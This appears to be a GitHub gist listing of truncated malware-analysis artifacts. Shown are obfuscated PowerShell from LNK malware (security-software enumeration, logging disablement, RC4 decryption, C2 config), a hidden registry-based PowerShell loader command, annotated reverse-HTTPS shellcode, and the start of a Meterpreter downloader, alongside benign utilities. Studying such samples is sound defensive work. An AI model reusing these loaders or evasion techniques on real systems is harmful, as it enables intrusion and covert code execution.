jdferrell3
jdferrell3
/ logfile-comparison.ps1
Created
June 5, 2020 00:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # From "LNK file" malware | |
| function Get-Soft { | |
| param ( | |
| [Parameter(ValueFromPipeline=$true)] | |
| [string[]]$ComputerName = $env:COMPUTERNAME, | |
| [string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124)) | |
| ) | |
| foreach ($comp in $ComputerName) { | |
| $keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92) | |
| foreach ($key in $keys) { |
jdferrell3
/ logfile-first-payload.ps1
Created
June 3, 2020 05:42
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False; | |
| Function jpnm { | |
| sal bifsynume Add-Type ; | |
| if ($($PSVersionTable.PSVersion.Major) -ge 3){$e = 'CSharp'}else{$e = 'CSharpVersion3'} | |
| bifsynume @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class tqjn | |
| { |
jdferrell3
/ logfile-final-payload-anon.ps1
Created
June 3, 2020 04:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function rsrzis { | |
| $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security"); | |
| $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core"); | |
| $ErrorActionPreference = "SilentlyContinue"; | |
| function wlc2 { | |
| param([Byte[]]$mfvoiqhn_12tkvf,[Byte[]]$gibqokxyxbupwcsrtuvm_41nhwrp) | |
| [Byte[]]$eplkztikdybroisgypg9qdbjfhmi = New-Object Byte[] $mfvoiqhn_12tkvf.Length;$mfvoiqhn_12tkvf.CopyTo($eplkztikdybroisgypg9qdbjfhmi, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256; | |
| for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $gibqokxyxbupwcsrtuvm_41nhwrp[$i % $gibqokxyxbupwcsrtuvm_41nhwrp.Length];} | |
| $j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0; |
jdferrell3
/ removebyhash.ps1
Created
March 4, 2020 00:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # remove files that match a specified hash | |
| $PATH = "c:\testing" | |
| $HASH = "39DD73E4DAE46B506E7F9B41066F7F21E5D61DADD4D2B5806D31E364886C2D08" | |
| $files = Get-ChildItem -Path $PATH -File | |
| ForEach ($f in $files) | |
| { | |
| $fullpath = "$PATH\$f" | |
| $hashInfo = Get-FileHash $fullpath -Algorithm SHA256 |
jdferrell3
/ meterpreter_downloader.ps1
Created
September 3, 2019 00:42
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $IP = 'X.X.X.X' | |
| $Port = 53 | |
| $VirtualAlloc = $null | |
| $CreateThread = $null | |
| $WaitForSingleObject = $null | |
| $XORKEY = 0x50 | |
| function XorByteArr | |
| { | |
| Param | |
| ( |
jdferrell3
/ lnk_powershell_stage3_deobfuscated
Created
May 29, 2019 13:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Semi-deobfuscated PowerShell from malware analysis | |
| function sdnfjshdklfhlj { | |
| $ag = @{ | |
| srv = ("{3}{1}{0}{2}{4}{5}"-f '.','//YYY','Y','http:','Y.YYY','.YYY'); | |
| skkey = 'b[CgNFd8=sSQ{YsBcX6|PJ+A~w?#LEKH'; | |
| usag = (("{3}{9}{12}{14}{0}{18}{11}{7}{5}{16}{20}{23}{1}{8}{19}{6}{10}{22}{15}{2}{4}{21}{13}{17}"-f 'NT 6.1;','o); OPR/4','.0.3282.1','Mozilla/5','19; ','WebKit/5','44; Ch','ple','3.','.0 (Wi','rome','; x64) Ap','ndow','5','s ','64','37.36','37.36',' Win64','0.2441.11',' (KHTML, like ','Safari/','/','Geck')); | |
| conType = ("{1}{0}{4}{2}{3}"-f 'pl','ap','ion/x','ml','icat') | |
| reffer = ("{9}{2}{4}{7}{3}{8}{0}{10}{11}{5}{6}{12}{1}"-f 'oft','x','/www.u','i','pdate','/d','oc','.m','cros','https:/','.','com','s.asp'); | |
| encutf = [System.Text.Encoding]::UTF8; |
jdferrell3
/ DisplayPath.cpp
Created
April 4, 2019 23:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #ifndef UNICODE | |
| #define UNICODE | |
| #endif | |
| #include<windows.h> | |
| int WINAPI wWinMain(HINSTANCE hinstance, HINSTANCE hprevinstance, PWSTR szCmdLine, int nCmdShow) | |
| { | |
| wchar_t path[256]; | |
| DWORD size = 256; |
jdferrell3
/ gist:6b2be0386caff742fbc1647714d7a21a
Created
December 31, 2018 19:21
Setup Python virtualenv on Ubuntu
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apt-get install python3-venv | |
| python3 -m venv {env_dir} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import gzip | |
| import base64 | |
| import StringIO | |
| # python bgzip.py | |
| # H4sIAErhF1wC/8tIzcnJBwCGphA2BQAAAA== | |
| # hello | |
| def gzip_and_base64(s): | |
| out = StringIO.StringIO() |
jdferrell3
/ powershell_payload_shellcode.asm
Last active
January 17, 2024 14:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; shellcode found on Windows host. Payload was stored in the registry. Powershell | |
| ; was used to extract it from the registry and execute it: | |
| ; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \ | |
| ; hidden -c "$val = (gp HKLM:SOFTWARE\'').''; \ | |
| ; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d" | |
| ; The following references were used to help comment the shellcode | |
| ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm | |
| ; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/ |
NewerOlder